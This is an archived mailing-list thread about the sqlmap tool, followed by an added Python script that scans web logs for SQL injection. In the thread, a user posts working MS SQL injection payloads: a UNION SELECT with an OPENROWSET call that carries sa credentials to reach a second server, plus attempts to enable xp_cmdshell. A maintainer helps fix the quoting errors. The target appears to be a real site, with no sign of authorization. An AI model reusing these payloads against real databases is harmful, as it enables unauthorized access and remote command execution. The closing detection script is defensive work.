Re: [sqlmap-users] error with ms sql
From: Miroslav S. <mir...@gm...> - 2012-06-21 12:19:21
Hi Adi.

I think that that is really the proper way how to "escape" the single quote in MsSQL (http://stackoverflow.com/questions/1586560/how-do-i-escape-a-single-quote-in-sqlserver) and you can't use any CHAR() escaping directly inside the OPENROWSET (there are some ways how to do it via EXEC http://social.msdn.microsoft.com/forums/en-US/transactsql/thread/0f78e033-53a4-4404-a190-9e3b269874ec <- you can use there a CHAR() escaping, but I really do believe that this is unnecessary in your case).

So, I would suggest you to continue playing around a bit (e.g. with other extended stored procedures (http://www.mssqlcity.com/Articles/Undoc/UndocExtSP.htm) to see if the problem persists).

Kind regards,
Miroslav Stampar

On Thu, Jun 21, 2012 at 1:12 PM, Adi Mutu <adi...@ya...> wrote:

> -1 union all select '1','2','3','4','5','6','7','8','9','10','11','12', (
> select * from
> OPENROWSET('SQLOLEDB','uid=sa;pwd=1234;Network=;Address=192.168.1.4;timeout=5','
> select @@version; master..sp_configure ''xp_cmdshell'',1
> ')),'aaa','15','16','17','18','19','20','21' from teachers7 where id=808
>
> the problem is with the query:
>
> select @@version; master..sp_configure ''xp_cmdshell'',1
> Any possibility to give the string from ascii codes as in mysql?
>
> ------------------------------
> *From:* Miroslav Stampar <mir...@gm...>
> *To:* Adi Mutu <adi...@ya...>
> *Cc:* "sql...@li..." <sql...@li...>
> *Sent:* Thursday, June 21, 2012 2:01 PM
> *Subject:* Re: [sqlmap-users] error with ms sql
>
> It all depends on context. You'll need to send a sample that you want to
> run. Quotes are not interpreted/parsed everywhere the same.
>
> Kind regards
>
> On Thu, Jun 21, 2012 at 12:57 PM, Adi Mutu <adi...@ya...> wrote:
>
> my feeling is that
> "[OLE/DB provider returned message: Deferred prepare could not be
> completed." is because of an sql error:) so my fault.
>
> and regarding the second error, I think you must always return some
> columns in the query , such as select @@version.
>
> now question is how do i embed a string inside another string delimited
> with quotes? Looks like double quotes is not working.....doubling quote ''
> looks like not working always....
>
> ------------------------------
> *From:* Adi Mutu <adi...@ya...>
> *To:* Miroslav Stampar <mir...@gm...>
> *Cc:* "sql...@li..." <sql...@li...>
> *Sent:* Thursday, June 21, 2012 11:45 AM
> *Subject:* Re: [sqlmap-users] error with ms sql
>
> tried, same stuff.
> I've tried to reenable xp_cmdshell first with
>
> master..sp_configure 'show advanced options',1
> reconfigure
> master..sp_configure 'xp_cmdshell',1
> reconfigure
>
> and got the same error: [OLE/DB provider returned message: Deferred
> prepare could not be completed.]
>
> then with 'exec sp_addextendedproc "xp_cmdshell","xp_log70.dll" '
> and got error:
>
> OLE DB error trace [Non-interface error: OLE DB provider unable to process
> object, since the object has no columnsProviderName='SQLOLEDB', Query=exec
> sp_addextendedproc "xp_cmdshell","xp_log70.dll" '].
>
> ------------------------------
> *From:* Miroslav Stampar <mir...@gm...>
> *To:* Adi Mutu <adi...@ya...>
> *Cc:* "sql...@li..." <sql...@li...>
> *Sent:* Thursday, June 21, 2012 11:26 AM
> *Subject:* Re: [sqlmap-users] error with ms sql
>
> try with master..resultabcd
>
> i forgot to mention that there needs to be two dots (or schema name in
> between) between db name and table name in mssql
>
> On Thu, Jun 21, 2012 at 10:24 AM, Adi Mutu <adi...@ya...> wrote:
>
> Hi Miroslav,
>
> got db_name master and tried with master.resultabcd but i get the same
> error.
>
> Kind Regards,
> A.
>
> ------------------------------
> *From:* Miroslav Stampar <mir...@gm...>
> *To:* Adi Mutu <adi...@ya...>
> *Cc:* "sql...@li..." <sql...@li...>
> *Sent:* Thursday, June 21, 2012 11:11 AM
> *Subject:* Re: [sqlmap-users] error with ms sql
>
> Hi Adi.
>
> You could try prepending the database name to the resultbcd. It seems that
> in case of linked server(s) doing that fixes the mentioned problem
> (Reference:
> http://cadarsh.blogspot.com/2011/02/deferred-prepare-could-not-be-completed.html?showComment=1336571978284#c7393130515903351466
> )
>
> Kind regards,
> Miroslav Stampar
>
> On Thu, Jun 21, 2012 at 10:01 AM, Adi Mutu <adi...@ya...> wrote:
>
> I'm having an injection like this:
> openrowset in a union (I've managed to do a SELECT @@version on
> 192.168.1.4)
>
> -1 union all select '1','2','3','4','5','6','7','8','9','10','11','12', (
> select * from
> OPENROWSET('SQLOLEDB','uid=sa;pwd=1234;Network=;Address=192.168.1.4;timeout=5','select
> output from resultbcd')),'aaa','15','16','17','18','19','20','21' from
> teachers7 where id=808
>
> and when I try to select from resultabcd i get:
> [OLE/DB provider returned message: Deferred prepare could not be
> completed.]
>
> could not find a good answer with google. Thanks.
>
> Kind regards,
> A.
>
> ------------------------------------------------------------------------------
> Live Security Virtual Conference
> Exclusive live event will cover all the ways today's security and
> threat landscape has changed and how IT managers can respond. Discussions
> will include endpoint security, mobile security and the latest in malware
> threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
> --
> Miroslav Stampar
> http://about.me/stamparm

--
Miroslav Stampar
http://about.me/stamparm
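The T-SQL constructs discussed in this thread (an ad hoc OPENROWSET carrying credentials, sp_configure, xp_cmdshell, sp_addextendedproc) are also what a defender can look for in web request logs. The following is an added example, not part of the original thread or of sqlmap: a small triage function that URL-decodes query strings and flags those constructs. The rule names, the simplified log format and the sample lines are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Rule names are this example's own; the patterns cover constructs quoted in the thread.
RULES = {
    "openrowset_adhoc": re.compile(
        r"openrowset\s*\(\s*'[^']*'\s*,\s*'[^']*(?:uid|pwd)\s*=", re.I),
    "sp_addextendedproc": re.compile(r"\bsp_addextendedproc\b", re.I),
    "sp_configure": re.compile(r"\bsp_configure\b", re.I),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "xp_cmdshell": re.compile(r"\bxp_cmdshell\b", re.I),
}
SQL_COMMENT = re.compile(r"/\*.*?\*/", re.S)

# Constructed sample requests (simplified "METHOD path?query PROTO" format).
SAMPLE_LOG = [
    "GET /teachers.asp?id=808 HTTP/1.1",
    "GET /teachers.asp?id=-1+union+all+select+'1',(select+*+from+"
    "OPENROWSET('SQLOLEDB','uid=sa;pwd=EXAMPLE;Address=192.0.2.10',"
    "'select+@@version')) HTTP/1.1",
    "GET /teachers.asp?id=1%253Bexec%2520master..sp_configure%2520"
    "%2527xp_cmdshell%2527%252C1 HTTP/1.1",
    "GET /search.asp?q=union+station+select+committee HTTP/1.1",
]

def normalize(raw):
    """URL-decode up to three times, drop /* */ comments, collapse whitespace."""
    text = raw
    for _ in range(3):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    text = SQL_COMMENT.sub(" ", text)
    return re.sub(r"\s+", " ", text)

def classify(query_string):
    """Return the sorted names of all rules that match the normalized query."""
    text = normalize(query_string)
    return sorted(name for name, rx in RULES.items() if rx.search(text))

def triage(log_lines):
    """Return (line_number, rule_names) for every request that matches a rule."""
    findings = []
    for number, line in enumerate(log_lines, 1):
        _, _, query = line.partition("?")
        hits = classify(query)
        if hits:
            findings.append((number, hits))
    return findings
```

Calling `triage(SAMPLE_LOG)` flags the second and third requests; the fourth contains the words "union" and "select" but not as a UNION SELECT clause, so it is left alone.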